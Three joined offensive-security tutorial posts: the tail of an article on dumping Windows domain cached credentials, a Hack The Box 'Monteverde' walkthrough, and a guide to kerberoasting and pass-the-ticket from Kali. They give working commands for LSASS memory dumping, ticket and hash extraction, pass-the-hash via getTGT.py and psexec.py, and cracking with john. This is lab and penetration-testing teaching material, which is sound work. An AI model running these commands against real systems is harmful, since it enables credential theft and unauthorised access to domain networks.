Just like the Powershell empire, you can use koadic to extract the DCC2 hashes. You can read more about koadic from here. Run following module to hashes:

use mimikatz_dotnet2js
set MIMICMD lsadump::cache

And again, you will get the MSCACHEv2 hashes on your screen.

Python Script

Just like impacket, you can download the MSCACHEV2 python script to extract the stored hashes. Download the script from github and then use security and system files  (As discussed in Impacted)

python mscache.py –security /root/Desktop/security –system /root/Desktop/system

And again, you will get the MSCACHEv2 hashes on your screen.

Cracking DCC2 or MACHACHE2/MSCASH2

As we know these hashes are not used in PASS The Hash attack, thus we need to use john the ripper to crack these hashes for utilising it.

john --format=mscasch2 --wordlist=/usr/share/wordlists/rockyou.txt mhash

As a result, it has dumped the password in clear text for the given hash file. Hence don’t get confused between DCC2 or MSCACHEV2/MSCASH hash these all are same and you can use the above-discussed the method to extract them.

The post Credential Dumping: Domain Cache Credential appeared first on Hacking Articles.

Today we’re going to solve Hack The Box’s “Monteverde” machine. This lab is of “medium” level, although you will see that it is quite simple.

Level: Medium

Penetration Testing Methodology

• Reconnaissance
• Nmap
• Enumeration
• Enum4Linux
• Bruteforce SMB Login (Metasploit)
• Smbclient
• Exploiting
• Evil-winrm
• Powershell Scripts
• Privilege Escalation
• Abuse of Azure’s group privileges
• Capture the flag

Walkthrough

Reconnaissance

We start with a scan of the 5,000 main ports:

nmap -sV --top-ports 5000 10.10.10.172

Enumeration

After checking each of the services, it is time to obtain as much information as possible from the Samba service (port 445) with the help of the “Enum4linux” tool.

We list the domain name:

And the list of users that belong to the corporation:

Exploiting

We create a file “users.txt” and introduce the different users found in the previous phase.

Now and with the “smb_login” module of Metasploit, we make a brute force, we will indicate the same file “users.txt” for the option “user_file” and “pass_file“. Disable the “verbose” mode so that only positive results appear.

We’ll get a match, so we already have some credentials to be able to gossip in the organization’s files.

We use the credentials and see that we have several areas to check.

I’ll save you time and we’ll access the “users$” resource.

Privilege Escalation (user)

We access the user’s folder “mhope” and find a file called “azure.xml“. Of course, my friend! We downloaded it!

We execute the command “cat” on the file “azure.xml” and find some access credentials for the user “mhope“.

We use these credentials to connect by RDP (Remote Desktop Protocol) service with the help of “Evil-winrm” and we will read the “user.txt” flag.

Privilege Escalation (administrator)

We execute the command “whoami /all” to obtain all the information of our committed user.

We found in the information that we belong to the group of administrators of Azure.

Now, we will leave the “Evil-winrm” session and download the following script in Powershell called “Azure-ADConnect.ps1“.

And we’ll connect again with “Evil-winrm“, but this time, we’ll specify a new command to indicate the path where the “Azure-ADConnect” file is located.

The following commands will make the script load in Powershell in our Evil-winrm, the second command will make it synchronize with the Active Directory located in Azure and will return us the administrator credentials.

Once we have obtained the administrator credentials, we will connect to them again and read the “root.txt” flag.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks Contacted on LinkedIn.

The post Hack the Box: Monteverde Walkthrough appeared first on Hacking Articles.

In our previous post, we explained the Kerberoasting attack in detail, which you can read from here. I recommend, then, to revisit our previous article for better understanding before implementing the attack mentioned in this section.

In this post, we will discuss how to perform a kerberoasting attack and remotely pass the Kerberos ticket using Kali Linux. Kerberoasting is considered to be lateral movement, so once you have penetrated the domain client system and obtained the computer shell, then use the following method for abusing Kerberos.

Table of Content

Pass the ticket

• kirbi2ccache
• py

Kerberoasting

• Kirbi2john

Pass the Ticket: kirbi2ccache

In order to abuse Kerberos against pass the ticket or kerberoasting attack, we need to import DMP file in our local machine (Kali Linux) through Client machine and to do this execute the following command through meterpreter session.

load powershell
powershell_shell
Get-Process Lsass
cd C:\Windows\System32
.\rundll32.exe comsvcs.dll, MiniDump 628 C:\lsass.DMP full

Why we need Lsass.DMP file?

Because of LSASS.DMP stores the TGT & TGS ticket in the kirbi format for some period of time and using this DMP file we can obtain the following:

• NTLM HASH of User
• KRB5_TGT ticket
• KRB5_TGS ticket
• NTLM HASH for Service

Once you have dumped the lsass.dmp, download it on your local machine for extracting kirbi files.

download lsass.DMP /root/Desktop/

Download and install pypykatz for extracting stored Kerberos tickets in Kirbi format from inside the lsass.DMP file by executing the following commands

mkdir /root/kerb
pypykatz lsa -k /root/kerb minidump /root/Desktop/lsass.DMP

As you can observe we have obtained all Kerberos ticket in kirbi format as well as the NTLM HASH for user Yashika. 

Currently, we have enumerated the KRB5_TGT ticket authorized for user “Yashika”. Let try to pass the ticket to get TGS and access the requested services.

Kirbi2ccache is a python script that falls under the Impacket library, transforming the kirbi format file into ccache and then using Export KRB5CCCNAME to inject the ccache file into DC to get access to the requesting service.

kirbi2ccache TGT_IGNITE.LOCAL_yashika_krbtgt_IGNITE.LOCAL_6d469878.kirbi yashika.ccache
export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local

Impacket GetTGT.py

Likewise, this can also be accomplished with the help of getTGT.py, as it will request a TGT and save it as ccache by giving a password, hash or aesKey.

If you recall that for user Yashika we have extracted the NTLM HASH. Now we have used the following command to request a TGT from DC and save it in CCache format. Laterally we can inject the ccache file into DC with the help of Export KRB5CCNAME to get access to the requesting service.

python getTGT.py -dc-ip 192.168.1.105 -hashes :64fbae31cc352fc26af97cbdef151e03 ignite.local/yashika
export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local

Kerberosasting: kirbi2john

As we said with the help of stored KRB5_TGS, we can extract the NTLM hashes for Service Server and try to crack the hash in order to get the password in clear text or use this hash to pass the hash attack. This would be known as kerberoasting.

Now as you can see in the highlight image we’ve outlined the KRB5_TGS for SQL Server in kirbi format and converted it to john crackable format with the help of kirbi2john.py (possible at /usr/ share/john/) called “TGS hash;” then use john for brute force password.

/usr/share/john/kirbi2john.py <KRB5_TGS kirbi>  > <Output file name>
john --wordlist=/usr/share/wordlists/rockyou.txt TGS_hash

Booom!!!! We found the password for SQL service server.

The post Kerberoasting and Pass the Ticket Attack Using Linux appeared first on Hacking Articles.